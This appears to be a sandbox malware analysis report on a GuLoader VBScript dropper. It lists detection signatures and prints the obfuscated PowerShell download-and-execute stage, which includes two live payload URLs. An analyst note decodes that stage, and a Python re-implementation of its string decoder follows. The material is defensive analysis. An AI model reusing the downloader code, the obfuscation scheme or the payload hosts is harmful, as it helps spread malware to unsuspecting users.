Windows Analysis Report
Urgent_File_Confirmation_00000000000000000000.vbs
Overview
General Information
Detection
GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7328 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent_File_Confirmation_00000000000000000000.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 7456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){. ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo. zSiIlSlna, /S5 . 0U U (.WSiSn dS opwSs .NFT l 1D0O..0 ; sWOi nE6 P4e;B CxO6 E4N;S .rSv H:R1 2 1 . 0O)T .G e Gc k oT/G2 ,0V1,0P0S1 M0L1M fFTi r.e.fKoBx G/,1M2.1s. C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n ,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJnt g,eSr n eA .Gs.e a >F hStItApTse : /B/Sm i, lSa n a,cJ e sB.Vc o m /uM aFg n,e,tui sF ePr i n gN e rVnBeO.G sOeHa ';$Diftongeringerne=Nordvest61 '.> S ';$Tantarabobus=Nordvest61 ' .iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcP h.oK P%HaH p,p dPa tI aU%.\ PSaF rMaNp hPyL s i.f,eSrd o u.s ..MD aKk. h& &B eGc hMo B t ';Diagonalgade209 (Nordvest61 'U$Sg.le o bRaUlM:, rRe k rPu t,sT=K(GcB m d F/ cI $ A,l.lSu vCi,aut e, ) ');Diagonalgade209 (Nordvest61 'G$Cg,l ,oBbAa l : PbOyAr,eUn .d eLr.n e As,= $SR,i Ys,t oMrLn To s,3.3K. DsSp l,i t .( $TD isf Ft o.nHgCe rUiun g,e Or.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,t A.PSTe rav ,i cBeBP o i nAtMMaa ,n aCgte,r ,]I: :CS e Mc,uSr i,t .y,PRrUo,t o cDoDl E =E M[PNOeG t..SSReDc. uMr i t yF PErMout,oB c,o lUTFy pOe ] :.:, T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D $BgTl oPbE a.l :DUMnP sAubmTpSt. u,oHu.s.l y,=UN eOwK -fO.bFjSeS c tJ FS yC s tme,mF.P NNe.t .HWi eLb C l iS eUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEn
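Analyst note on the PowerShell stage above. Nordvest61 is the string decoder: $Optionally becomes 1 as soon as ${host}.CurrentCulture is non-null, and the loop then takes Substring(i, 1) for i = 1, 3, 5, ... while i < Length - 1, so only the characters at odd indices survive and the even indices are filler (the case-mangled 'SUBsTRI' + 'ng' still resolves to Substring because PowerShell method lookup is case-insensitive). Diagonalgade209 dot-sources $Tantarabobus, which decodes to iex, over its argument, so each Diagonalgade209 (Nordvest61 '...') call is an Invoke-Expression of a decoded statement. Reading the literals with the spurious layout spaces of this report removed, they decode to the Firefox User-Agent value Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 and the header name User-Agent; a '>'-separated list of two payload URLs, http://103.195.237.43/Magnetiseringerne.sea and https://milanaces.com/Magnetiseringerne.sea, of which $byrendernes[0] is kept; the statement [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; and $global:Unsumptuously=New-Object System.Net.WebClien, whose final 't' is $rekruts[1], the second output line of cmd /c "echo %appdata%\Paraphysiferous.Mak && echo t" ($rekruts[0] is the expanded drop path). The Python below is an added example, not the sample's code and not part of the report: it re-implements the decoder, builds its own obfuscated literals with a filler alphabet of my choosing, and replays the decoded control flow. The URLs and the %appdata% value in it are placeholders (documentation address, .invalid domain, a constructed sandbox path); the other plaintexts are my decoding of the report's literals.

```python
import random

# Filler alphabet for the constructed literals (my choice; the sample's filler is
# letters, punctuation and spaces, which is why the report's literals look like noise).
FILLER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ,.;: "


def nordvest61(obfuscated, optionally=1):
    """Mirror of the sample's decoder: with $Optionally = 1 the loop takes
    Substring(i, 1) for i = 1, 3, 5, ... as long as i < Length - 1.
    Even-index characters are filler and are dropped."""
    defrauding = len(obfuscated) - optionally
    out = []
    i = optionally
    while i < defrauding:
        out.append(obfuscated[i:i + optionally])
        i += 2
    return "".join(out)


def obfuscate(plaintext, seed=0):
    """Constructed inverse of nordvest61 (the sample ships only the decoder): one filler
    character before every plaintext character and one after the last, so the plaintext
    sits at odd indices and the loop bound Length - 1 still reaches its last character."""
    rng = random.Random(seed)
    return "".join(rng.choice(FILLER) + c for c in plaintext) + rng.choice(FILLER)


def cmd_echo(command, env):
    """Emulate `cmd /c "echo ... && echo ..."` far enough for this stage: expand %VAR%
    references from `env` and return one output line per echo.  Whitespace around &&
    is trimmed here; real cmd.exe keeps the space that precedes && in the first line."""
    lines = []
    for part in command.split("&&"):
        part = part.strip()
        if not part.lower().startswith("echo "):
            raise ValueError("only echo is emulated: " + part)
        text = part[5:]
        for name, value in env.items():
            text = text.replace("%" + name + "%", value)
        lines.append(text)
    return lines


def replay_stage(literals, env):
    """Replay the decoded control flow of the PowerShell stage: decode each literal,
    split the URL list on the decoded separator and keep element [0] (as the sample
    does with $byrendernes[0]), and complete the WebClient expression with the second
    line of cmd.exe output ($rekruts[1])."""
    rekruts = cmd_echo(nordvest61(literals["cmd"]), env)
    urls = nordvest61(literals["urls"]).split(nordvest61(literals["sep"]))
    return {
        "invoker": nordvest61(literals["iex"]),          # what Diagonalgade209 dot-sources
        "header": nordvest61(literals["header"]),
        "user_agent": nordvest61(literals["ua"]),
        "primary_url": urls[0],
        "fallback_urls": urls[1:],
        "drop_path": rekruts[0],                          # $rekruts[0]
        "webclient_expr": nordvest61(literals["webclient"]) + rekruts[1],
    }


# Constructed literals: same scheme as the sample, my own filler, placeholder URLs
# (RFC 5737 address, .invalid domain).  The other plaintexts mirror what the report's
# literals decode to.
SAMPLE_LITERALS = {
    "ua": obfuscate("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", 1),
    "header": obfuscate("User-Agent", 2),
    "urls": obfuscate("http://192.0.2.10/payload.sea>https://example.invalid/payload.sea", 3),
    "sep": obfuscate(">", 4),
    "iex": obfuscate("iex", 5),
    "cmd": obfuscate(r"echo %appdata%\Paraphysiferous.Mak && echo t", 6),
    "webclient": obfuscate("$global:Unsumptuously=New-Object System.Net.WebClien", 7),
}
SAMPLE_ENV = {"appdata": r"C:\Users\user\AppData\Roaming"}   # constructed sandbox environment


if __name__ == "__main__":
    for key, value in replay_stage(SAMPLE_LITERALS, SAMPLE_ENV).items():
        print(f"{key:15} {value}")
```

To apply the decoder to a literal copied from a clean (non-wrapped) copy of the command line, pass it to nordvest61 unchanged; the trailing filler character matters, because without it the loop bound Length - 1 drops the last plaintext character.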